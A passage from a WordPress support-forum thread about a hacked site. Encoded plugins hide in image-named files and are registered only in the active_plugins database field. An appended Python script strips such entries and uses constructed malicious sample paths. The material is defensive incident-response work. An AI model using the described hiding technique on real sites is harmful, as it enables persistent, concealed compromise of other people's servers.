    The plot thickens. Have you looked at 404_old.gif. Reading your post, I picked one site, and also found a bogus theme: comments-popup_old.png (also an image name ... hmmmm). Here is a snippet from that odd looking content:


    This file is timestamped April 11th. I'll look for more later. There probably are many more left to unearth.

  28. appleo
    Posted 8 years ago #

    So far I have found 3 of these files. All are exactly 11128 bytes. Two had identical content, but not the third. Two were in non-WP directories (one was in an Apache log directory). All had image like names (one was jpg, one was jpeg and one png). I don't know if this is the end of this trail or not.

  29. ajparker
    Posted 8 years ago #

    It looks like those phantom-encrypted/encoded plugins are how they've "altered" the display version number.

    The first tip off I had something was wrong on one of my installs was upgrading to the new 2.5.1 - for some reason it claimed it was still running 2.5 - I wiped everything and tried again - still it claimed to be 2.5 - I checked the files and the version 2.5.1 is listed in the files - so I started looking closer - found the wp-info.txt as well as the WordPress user.

    I also found the /tmp/ file listed as a plugin and one in the classic theme folder which had identical encrypted/encoded content - removing the plugins was the last change that fixed the version number - these plugins were only shown in the database field - not in the admin area.

    Hopefully that's ALL the damage.

  30. BurstCollective
    Posted 8 years ago #

    but how do you edit those database fields? I think this is where I need to make a final sweep for miscreants.
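    Posts 26, 29 and 30 circle the same field: the active_plugins row in wp_options, which WordPress stores as a PHP-serialized array, with entries that never show in the Plugins screen because they point outside wp-content/plugins (a /tmp session file, a file in the classic theme folder). Editing it by hand means keeping the element count and the string lengths consistent, which is the "number of plugins" fpmsummer had to correct. As an added example, not code from this thread, the Python below parses that value, drops every entry that is not a plain plugin-relative path, and re-serializes it. The sample value is constructed.

```python
"""Parse and clean the PHP-serialized active_plugins option WordPress keeps in wp_options."""
import re

# A legitimate entry is relative to wp-content/plugins: "dir/file.php" or "file.php".
PLUGIN_ENTRY_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]*(?:/[A-Za-z0-9][A-Za-z0-9._-]*)?\.php$")


def unserialize_string_array(data):
    """Parse a PHP serialized array of int-keyed strings, e.g. a:1:{i:0;s:9:"hello.php";}.
    Operates on bytes because PHP string lengths are byte counts."""
    pos = 0

    def expect(tok):
        nonlocal pos
        if not data.startswith(tok, pos):
            raise ValueError(f"expected {tok!r} at offset {pos}")
        pos += len(tok)

    def read_until(delim):
        nonlocal pos
        end = data.index(delim, pos)
        tok, pos = data[pos:end], end + 1
        return tok

    expect(b"a:")
    count = int(read_until(b":"))
    expect(b"{")
    items = []
    for _ in range(count):
        expect(b"i:")
        key = int(read_until(b";"))
        expect(b"s:")
        length = int(read_until(b":"))
        expect(b'"')
        value = data[pos:pos + length]
        pos += length
        expect(b'";')
        items.append((key, value.decode("utf-8")))
    expect(b"}")
    if pos != len(data):
        raise ValueError("trailing data after array")
    return items


def serialize_string_list(values):
    """Serialize a list of str as a PHP array with keys re-indexed from 0 and a correct count."""
    out = [b"a:%d:{" % len(values)]
    for i, v in enumerate(values):
        b = v.encode("utf-8")
        out.append(b'i:%d;s:%d:"%s";' % (i, len(b), b))
    out.append(b"}")
    return b"".join(out)


def clean_active_plugins(serialized, installed=None):
    """Drop entries that are not plugin-relative paths (or, when `installed` is given, that are
    not in that set of known plugin files). Returns (new serialized value, removed entries)."""
    kept, removed = [], []
    for _, entry in unserialize_string_array(serialized):
        ok = bool(PLUGIN_ENTRY_RE.match(entry)) and (installed is None or entry in installed)
        (kept if ok else removed).append(entry)
    return serialize_string_list(kept), removed


def demo():
    """Constructed sample: one real plugin plus two entries of the kind reported in the thread."""
    sample = serialize_string_list([
        "akismet/akismet.php",
        "/tmp/sess_0123abcd",                        # session file in /tmp registered as a plugin
        "../themes/classic/comments-popup_old.png",  # theme-folder file under an image name
    ])
    return clean_active_plugins(sample)


if __name__ == "__main__":
    new_value, removed = demo()
    print("removed:", removed)
    print("new active_plugins:", new_value.decode())
```

    Fetch the current value with SELECT option_value FROM wp_options WHERE option_name = 'active_plugins', run it through clean_active_plugins (passing the set of files actually present under wp-content/plugins as `installed` for a stricter check), and UPDATE the row with the result. The same parser can be pointed at any other serialized option you suspect, since WordPress uses the same format throughout wp_options.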
